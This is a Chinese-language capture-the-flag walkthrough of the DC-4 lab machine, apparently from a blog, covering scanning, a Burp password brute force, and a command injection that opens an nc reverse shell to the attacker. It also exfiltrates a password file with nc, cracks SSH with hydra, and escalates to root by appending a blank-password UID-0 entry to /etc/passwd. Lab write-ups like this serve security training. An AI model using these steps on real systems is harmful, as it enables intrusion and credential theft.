DC4靶机渗透测试
文章目錄
- 環境版本:
- 一、信息收集
- 1.主機發現
- 2.端口掃描
- 二、漏洞挖掘
- 1.訪問目標 ip,查看內容
- 2.使用 BP 進行爆破密碼
- 3.使用密碼登陸
- 4.使用 BP 查看執行命令流量包
- 5.替換命令來使用 nc 建立連接
- 7.使用 nc 將靶機文件傳輸到攻擊機
- 8.使用 hydra 爆破 ssh 密碼
- 9.ssh 登陸,進行信息收集
- 10.提權
描述:從靶機DC-3開始,只有一個入口和一個最終的flag,
只有拿到root權限才可以發現最終的flag,DC-4也是一樣
環境版本:
- VMware pro 16
- Kali 2021.1(虛擬機)
- DC-4(虛擬機)
該實驗因個人原因,網絡更換若干次,請自行判斷 ip 屬于靶機還是攻擊機
一、信息收集
1.主機發現
arp-scan -l
發現靶機 ip
2.端口掃描
nmap -A -p- 192.168.43.35
發現其開啟了 22 端口,ssh 服務
80 端口,Nginx 服務
二、漏洞挖掘
1.訪問目標 ip,查看內容
發現是一個信息系統登入界面,提示用戶名為 admin
2.使用 BP 進行爆破密碼
1)準備密碼本,沒有可以使用 kali john工具的密碼本,位置:
/usr/share/john/password.lst cp /usr/share/john/password.lst ./1.txt #復制到桌面(在桌面打開的終端)
2)使用 BP 進行抓包
3)發送到 intruder,設置爆破點
4)加載密碼本
5)設置線程,我這設置的太大了,爆完之后502了…,重啟DC-4,嗚嗚嗚
6)查看爆破結果,得到密碼 happy
3.使用密碼登陸
發現有命令選項,進入后發現有命令列表,選中命令點擊 run 發現可以執行
4.使用 BP 查看執行命令流量包
發現明文命令,并使用 ‘+’ 替換空格
5.替換命令來使用 nc 建立連接
1)攻擊機監聽端口:
nc -lvvp 233
2)BP 改包連接 nc
radio=nc+KALIIP+233+-e+/bin/sh&submit=Run
使用 ls 測試,發現成功連接
6.收集信息
發現 home 目錄有三個用戶:charles、jim、sam
jim 目錄下有 backups 目錄,和 test.sh 文件,查看該文件
發現作者整活
查看 backups 目錄,發現密碼備份,結合上邊 ssh 服務,懷疑是 ssh 密碼,
7.使用 nc 將靶機文件傳輸到攻擊機
攻擊機監聽: nc -lp 1234 >old-passwords.bak
靶機 shell 發送:(下方為攻擊機 ip)
nc 192.168.1.131 1234 <./old-passwords.bak
8.使用 hydra 爆破 ssh 密碼
新建 users.txt 將三個用戶每行一個寫入保存
hydra -L users.txt -P old-passwords.bak 192.168.1.111 ssh -t 60 -o passwd.txt #別忘更改 ip 為你的靶機 ip
得到 jim ssh 密碼
9.ssh 登陸,進行信息收集
ssh jim@192.168.1.111
1)發現郵件,查找郵件相關
得到 charles 賬戶密碼 ^xHhA&hvim0y
2)查看 jim 可執行 sudo 得命令
發現不行
3)使用 charles 賬戶登陸,查看 sudo 可執行命令
發現 teehee :-a 寫入文件內容,不覆蓋文件
10.提權
使用teehee創建空密碼賬號,并將其加入 root 組
echo "huang::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
總結
